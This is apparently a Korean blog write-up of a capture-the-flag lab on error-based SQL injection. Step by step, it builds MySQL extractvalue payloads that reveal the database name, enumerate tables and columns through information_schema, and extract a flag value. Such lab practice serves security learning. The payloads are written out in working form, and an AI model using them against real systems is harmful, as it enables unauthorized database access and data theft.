SQL 포인트 찾기
우리가 원하는 SQL 에러가 화면에 출력되고 있는지 확인한다.
에러를 출력 함수
extractvalue
공격 format 만들기
normaltic’ and extractvalue(’1’, concat(0x3a, (_____))) and ‘1’=’1
normaltic’ and extractvalue(’1’, concat(0x3a, (select ‘normaltic’))) and ‘1’=’1
DB 이름 출력해보기 : errSqli
normaltic’ and extractvalue(’1’,concat(0x3a, (______select database()_____))) and ‘1’=’1
normaltic’
normaltic' and extractvalue('1',concat(0x3a,(select database()))) and '1'='1
table 이름 알아내기
select table_name from information_schema.tables where table_schema=’errSqli’
normaltic' and extractvalue('1',concat(0x3a,(select table_name from information_schema.tables where table_schema=’errSqli’))) and '1'='1
normaltic' and extractvalue('1',concat(0x3a,(select table_name from information_schema.tables where table_schema=’errSqli’ limit 0,1))) and '1'='1
flagTable → member → plusFlag_Table → 존재하지않는 아이디입니다.
컬럼이름 추출하기
normaltic' and extractvalue('1',concat(0x3a,(select column_name from information_schema.columns where table_name='flagTable' limit 0,1))) and '1'='1
idx → flag → 존재하지 않는 아이디입니다.
데이터 추출하기
flagTable 테이블에 있는 flag라는 열의 데이터를 추출
normaltic' and extractvalue('1',concat(0x3a,(select flag from flagTable limit 0,1))) and '1'='1
'Information Technology > write-up' 카테고리의 다른 글
| SQL Injection 3 (error based) (0) | 2025.05.28 |
|---|---|
| SQL Injection (Blind Practice) (0) | 2025.05.28 |
| SQL Injection 2 - order by, union, limit (0) | 2025.05.28 |
| SQL Injection 1 - order by, like, union (0) | 2025.05.28 |
| Can you crack me? - base64, alternative (0) | 2025.05.28 |